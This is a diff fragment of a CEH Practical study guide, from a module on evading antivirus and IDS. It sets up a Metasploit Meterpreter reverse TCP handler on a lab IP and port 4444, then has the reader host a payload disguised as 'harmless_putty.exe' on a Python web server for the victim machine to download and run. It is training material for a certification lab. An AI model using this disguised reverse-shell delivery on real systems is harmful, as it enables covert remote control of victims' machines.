AbdullahYousaf-13/CEH-Practical-Guide/Module-12. Evading IDS, antivirus and Honeypots.md

 - `set payload windows/meterpreter/reverse_tcp`
 - `set LHOST 172.16.111.208`
 - `set LPORT 4444`
-- `exploit -j`
+- `exploit` or `exploit -j`

+Download harmless_putty
-Open a new terminal and start a web server to host your harmless_putty.exe file so the victim can download it.
+- Open a new terminal and start a web server to host your harmless_putty.exe file so the victim can download it.
   - `cd ~`
   - `python3 -m http.server 80`
 - Download on Victim Machine: On the victim machine (172.16.111.207), open a web browser and go to: http://172.16.111.208
 - Download the harmless_putty.exe file.
 - Execute the Payload: On the victim machine, run the harmless_putty.exe